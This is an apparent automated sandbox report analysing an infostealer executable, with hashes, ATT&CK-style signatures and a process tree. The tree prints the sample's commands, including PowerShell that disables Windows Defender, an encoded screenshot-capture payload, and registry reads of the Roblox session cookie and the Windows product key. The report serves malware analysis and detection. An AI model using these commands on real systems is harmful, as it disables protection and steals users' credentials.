Analysis

  • max time kernel
    44s
  • max time network
    46s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2025 14:34

General

  • Target

    Program.exe

  • Size

    7.5MB

  • MD5

    a251902a8bbbe4564fbe9bc06325e7a5

  • SHA1

    a4f0ea45b51f99df9dbcdf4d73de1744c12a5dba

  • SHA256

    790c7394a23d59216e1963197316475cd0c6b4f53c3803c65c0f8f407cdd99a9

  • SHA512

    3860976dbf69c2cd9dbcee98de59e6b28aa6ddd55aa17623fa60ed32322c335db3aa6fea3f07ac132b848648920a03ce62ec7fc4ff24957b1e2e50af192077fb

  • SSDEEP

    196608:RkunqZiwfI9jUC2XMvH8zPjweaBpZ0cX9ooccXK7odAxR:VWIH2XgHq+jq+3YoM

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Program.exe
    "C:\Users\Admin\AppData\Local\Temp\Program.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Users\Admin\AppData\Local\Temp\Program.exe
      "C:\Users\Admin\AppData\Local\Temp\Program.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2228
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Program.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Program.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:532
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4392
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3612
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4468
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4528
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:5052
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1044
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:1128
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4376
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4624
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:904
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3452
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:4576
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3392
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:712
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yoyz43br\yoyz43br.cmdline"
                5⤵
                  PID:4428
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB1E.tmp" "c:\Users\Admin\AppData\Local\Temp\yoyz43br\CSCE2A2EE8E54E14B3FB75B9CE8969E6A96.TMP"
                    6⤵
                      PID:3040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4980
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1668
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1132
                  • C:\Windows\system32\attrib.exe
                    attrib -r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:2012
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1952
                  • C:\Windows\system32\attrib.exe
                    attrib +r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:3764
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4556
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:376
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:1820
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2768
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          3⤵
                            PID:1892
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              4⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4644
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:3484
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:3856
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:2012
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1168
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1016
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:2988
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:5072
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4424
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "getmac"
                                        3⤵
                                          PID:3640
                                          • C:\Windows\system32\getmac.exe
                                            getmac
                                            4⤵
                                              PID:3572
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21282\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\sx25s.zip" *"
                                            3⤵
                                              PID:3540
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI21282\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI21282\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\sx25s.zip" *
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4632
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              3⤵
                                                PID:4916
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4464
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                3⤵
                                                  PID:396
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic computersystem get totalphysicalmemory
                                                    4⤵
                                                      PID:32
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    3⤵
                                                      PID:640
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        4⤵
                                                          PID:4228
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                        3⤵
                                                          PID:3168
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1328
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          3⤵
                                                            PID:548
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              4⤵
                                                              • Detects videocard installed
                                                              PID:5112
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            3⤵
                                                              PID:5084
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1004

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          3KB

                                                          MD5

                                                          8740e7db6a0d290c198447b1f16d5281

                                                          SHA1

                                                          ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                          SHA256

                                                          f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                          SHA512

                                                          d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          6d3e9c29fe44e90aae6ed30ccf799ca8

                                                          SHA1

                                                          c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                          SHA256

